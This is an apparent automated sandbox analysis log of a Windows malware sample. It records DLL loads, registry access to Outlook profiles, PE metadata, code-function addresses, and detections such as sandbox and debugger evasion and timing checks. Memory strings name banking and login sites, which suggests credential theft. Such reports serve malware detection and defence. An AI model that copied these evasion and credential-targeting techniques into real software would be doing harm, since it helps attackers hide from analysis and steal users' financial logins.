Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rasdial.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rasdial.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: cNDddMAF5u.exe

Static file information: File size 1266176 > 1048576

Source: cNDddMAF5u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cNDddMAF5u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cNDddMAF5u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cNDddMAF5u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cNDddMAF5u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cNDddMAF5u.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: cNDddMAF5u.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GVXcOVOPuWmumK.exe, 00000005.00000002.2581811705.000000000019E000.00000002.00000001.01000000.00000005.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2581841839.000000000019E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: cNDddMAF5u.exe, 00000001.00000003.1346554237.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cNDddMAF5u.exe, 00000001.00000003.1349050815.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1607996500.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1609929988.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1701357405.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1703817466.0000000005022000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.000000000536E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdb source: svchost.exe, 00000003.00000003.1668922870.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701441562.0000000003600000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2583970277.0000000001238000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cNDddMAF5u.exe, 00000001.00000003.1346554237.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cNDddMAF5u.exe, 00000001.00000003.1349050815.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1607996500.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1609929988.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.1701357405.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1703817466.0000000005022000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.000000000536E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdbGCTL source: svchost.exe, 00000003.00000003.1668922870.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701441562.0000000003600000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2583970277.0000000001238000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.2587246887.00000000057FC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2586519260.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2002060197.0000000006C3C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.2587246887.00000000057FC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2586519260.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2002060197.0000000006C3C000.00000004.80000000.00040000.00000000.sdmp

Source: cNDddMAF5u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cNDddMAF5u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cNDddMAF5u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cNDddMAF5u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cNDddMAF5u.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_006A42DE

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006AA40E push 00000000h; retf	1_2_006AA444
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C0A76 push ecx; ret	1_2_006C0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00403100 push eax; ret	3_2_00403102
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041E9B7 push esp; ret	3_2_0041E9BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040D307 push edx; ret	3_2_0040D30E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00417333 push ecx; retf	3_2_00417336
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00411C05 push esi; iretd	3_2_00411C1E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00411C13 push esi; iretd	3_2_00411C1E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00427C33 push eax; iretd	3_2_00427CA9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00425553 push ds; iretd	3_2_00425554
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040D53D push esi; retf	3_2_0040D53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004045F9 push ds; ret	3_2_004045FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00418605 push ebp; retf	3_2_00418633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00413FD3 push 8BA57A45h; iretd	3_2_00413FEA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C0225F pushad ; ret	3_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C027FA pushad ; ret	3_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C309AD push ecx; mov dword ptr [esp], ecx	3_2_03C309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C0283D push eax; iretd	3_2_03C02858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C01368 push eax; iretd	3_2_03C01369
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C01065 push edi; ret	3_2_03C0108A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C018F3 push edx; iretd	3_2_03C01906
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052009AD push ecx; mov dword ptr [esp], ecx	6_2_052009B6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_03214230 push ecx; retf	6_2_03214233
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_03215502 push ebp; retf	6_2_03215530
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_032215B1 push ecx; ret	6_2_032215B2
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_032244B0 push edi; ret	6_2_032244BB
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_032014F6 push ds; ret	6_2_032014FC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_03224B30 push eax; iretd	6_2_03224BA6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0320EB02 push esi; iretd	6_2_0320EB1B
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0320EB10 push esi; iretd	6_2_0320EB1B
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0321B8B4 push esp; ret	6_2_0321B8BC

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006BF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		1_2_006BF98E
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00731C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		1_2_00731C41

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_1-96649

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	API/Special instruction interceptor: Address: 16D60AC
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_03C7096E rdtsc

3_2_03C7096E

Source: C:\Windows\SysWOW64\rasdial.exe	Window / User API: threadDelayed 3246			Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Window / User API: threadDelayed 6727			Jump to behavior

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	API coverage: 3.7 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\rasdial.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\rasdial.exe TID: 336	Thread sleep count: 3246 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 336	Thread sleep time: -6492000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 336	Thread sleep count: 6727 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 336	Thread sleep time: -13454000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe TID: 1916	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rasdial.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rasdial.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0070DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	1_2_0070DBBE
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006DC2A2 FindFirstFileExW,	1_2_006DC2A2
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_007168EE FindFirstFileW,FindClose,	1_2_007168EE
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0071698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	1_2_0071698F
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0070D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_0070D076
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0070D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_0070D3A9
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00719642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00719642
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0071979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0071979D
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00719B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	1_2_00719B2B
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00715C97 FindFirstFileW,FindNextFileW,FindClose,	1_2_00715C97
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0321C8D0 FindFirstFileW,FindNextFileW,FindClose,	6_2_0321C8D0

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_006A42DE

Source: a155F05G.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: a155F05G.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: a155F05G.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: a155F05G.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: a155F05G.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: a155F05G.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: a155F05G.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: a155F05G.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: a155F05G.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: a155F05G.6.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2003747259.0000014E46C5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: GVXcOVOPuWmumK.exe, 00000007.00000002.2584767789.000000000120F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: a155F05G.6.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: a155F05G.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: a155F05G.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: a155F05G.6.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: a155F05G.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: a155F05G.6.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: a155F05G.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: a155F05G.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: a155F05G.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: a155F05G.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: a155F05G.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: a155F05G.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_03C7096E rdtsc

3_2_03C7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_00417903 LdrLoadDll,

3_2_00417903

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0071EAA2 BlockInput,

1_2_0071EAA2

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_006D2622

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_006A42DE

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C4CE8 mov eax, dword ptr fs:[00000030h]	1_2_006C4CE8
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_016D6378 mov eax, dword ptr fs:[00000030h]	1_2_016D6378
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_016D6318 mov eax, dword ptr fs:[00000030h]	1_2_016D6318
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_016D4D28 mov eax, dword ptr fs:[00000030h]	1_2_016D4D28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEC3CD mov eax, dword ptr fs:[00000030h]	3_2_03CEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]	3_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]	3_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]	3_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C383C0 mov eax, dword ptr fs:[00000030h]	3_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB63C0 mov eax, dword ptr fs:[00000030h]	3_2_03CB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	3_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	3_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]	3_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDE3DB mov eax, dword ptr fs:[00000030h]	3_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD43D4 mov eax, dword ptr fs:[00000030h]	3_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD43D4 mov eax, dword ptr fs:[00000030h]	3_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C403E9 mov eax, dword ptr fs:[00000030h]	3_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	3_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	3_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]	3_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C663FF mov eax, dword ptr fs:[00000030h]	3_2_03C663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E388 mov eax, dword ptr fs:[00000030h]	3_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E388 mov eax, dword ptr fs:[00000030h]	3_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E388 mov eax, dword ptr fs:[00000030h]	3_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5438F mov eax, dword ptr fs:[00000030h]	3_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5438F mov eax, dword ptr fs:[00000030h]	3_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28397 mov eax, dword ptr fs:[00000030h]	3_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28397 mov eax, dword ptr fs:[00000030h]	3_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28397 mov eax, dword ptr fs:[00000030h]	3_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB2349 mov eax, dword ptr fs:[00000030h]	3_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov ecx, dword ptr fs:[00000030h]	3_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB035C mov eax, dword ptr fs:[00000030h]	3_2_03CB035C
